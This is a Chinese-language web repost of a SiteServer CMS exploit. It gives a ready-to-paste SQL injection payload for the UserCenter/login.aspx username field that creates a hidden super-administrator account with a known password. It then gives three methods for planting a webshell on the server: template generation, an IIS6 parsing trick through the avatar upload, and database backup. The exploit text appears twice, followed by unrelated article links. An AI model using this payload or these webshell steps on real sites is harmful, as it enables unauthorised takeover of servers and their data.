SiteServer CMS UserCenter/login.aspx页面用户名处sql注射
来源:互联网 发布:广域网优化技术 编辑:程序博客网 时间:2024/05/10 07:54
经测试秒杀最新的3.5版
stieserver官网:www.siteserver.cn
EXP:
直接访问UserCenter/login.aspx
用户名处输入:
123'insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values('blue','VffSUZcBPo4=','Encrypted','i7jq4LwC25wKDoqHErBWaw==');insert into bairong_AdministratorsInRoles values('Administrator','blue');insert into bairong_AdministratorsInRoles values('RegisteredUser','blue');insert into bairong_AdministratorsInRoles values('ConsoleAdministrator','blue');--
密码为空,输入验证码后提交,既可向数据库中插入一个用户名为blue 密码为lanhai的超级用户。之后再访问后台SiteServer/login.aspx用插入的用户登陆。
后台拿webshell的三种方法:
一、
站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx
二、
成员权限-》添加用户-》用户名为:1.asp
http://127.0.0.1/usercenter/
用刚才添加的1.asp去登陆,进去之后上传个人头像,利用IIS6解析漏洞得webshell
(ps:后台添加用户时不会验证是否含有非法字符)
三、
系统工具-》实用工具-》机器参数查看
可以看到数据库类型、名称,WEB路径
系统工具-》数据库工具-》SQL语句查询
这功能做的不错,直接就相当于一个查询分析器,什么回显都有,可以backup得webshell,或者利用sqlserver配置不当直接XXOO
stieserver官网:www.siteserver.cn
EXP:
直接访问UserCenter/login.aspx
用户名处输入:
123'insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values('blue','VffSUZcBPo4=','Encrypted','i7jq4LwC25wKDoqHErBWaw==');insert into bairong_AdministratorsInRoles values('Administrator','blue');insert into bairong_AdministratorsInRoles values('RegisteredUser','blue');insert into bairong_AdministratorsInRoles values('ConsoleAdministrator','blue');--
密码为空,输入验证码后提交,既可向数据库中插入一个用户名为blue 密码为lanhai的超级用户。之后再访问后台SiteServer/login.aspx用插入的用户登陆。
后台拿webshell的三种方法:
一、
站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx
二、
成员权限-》添加用户-》用户名为:1.asp
http://127.0.0.1/usercenter/
用刚才添加的1.asp去登陆,进去之后上传个人头像,利用IIS6解析漏洞得webshell
(ps:后台添加用户时不会验证是否含有非法字符)
三、
系统工具-》实用工具-》机器参数查看
可以看到数据库类型、名称,WEB路径
系统工具-》数据库工具-》SQL语句查询
这功能做的不错,直接就相当于一个查询分析器,什么回显都有,可以backup得webshell,或者利用sqlserver配置不当直接XXOO
- SiteServer CMS UserCenter/login.aspx页面用户名处sql注射
- 简单Login.aspx页面写法
- SiteServer CMS 0Day
- SiteServer cms 授权破解教程
- SiteServer CMS 4.0 安装步骤
- siteServer CMS 建站流程
- Login.aspx
- Login.aspx and LogIn.aspx?!
- 如何使页面每次到Login.aspx页面
- SiteServer CMS 数据导出为 JSON
- SiteServer CMS的表结构说明
- .net如何将aspx生成html(cms静态页面原理)
- siteserver cms 建站大致步骤
- QuicklyBuildModel/Login.aspx.cs[快速类建模型登录页面代码]
- Asp2.0下Login.Aspx页面和VS2005登陆控件冲突问题
- 某款asp的cms程序注射漏洞
- sql注射总结
- Sql注射总结
- struts2.1的bug:Exception starting filter struts2 java.lang.NullPointerException
- SQL中的In的用法
- LVS/DR模式原理剖析(FAQs)
- eoe里面的实现GridView 长按跨屏拖动,以及自动移位。
- DM8148 开发记录 四
- SiteServer CMS UserCenter/login.aspx页面用户名处sql注射
- linphone
- Linux环境下U盘挂载与卸载
- java环境变量设置
- 分析oracle主键的跳号现象
- 连接池中的maxIdle,MaxActive,maxWait参数
- java服务器在Linux下实现负载均衡
- cocos3d加载3Dmax模型到ios中
- asp.net MVC中Bind特性的使用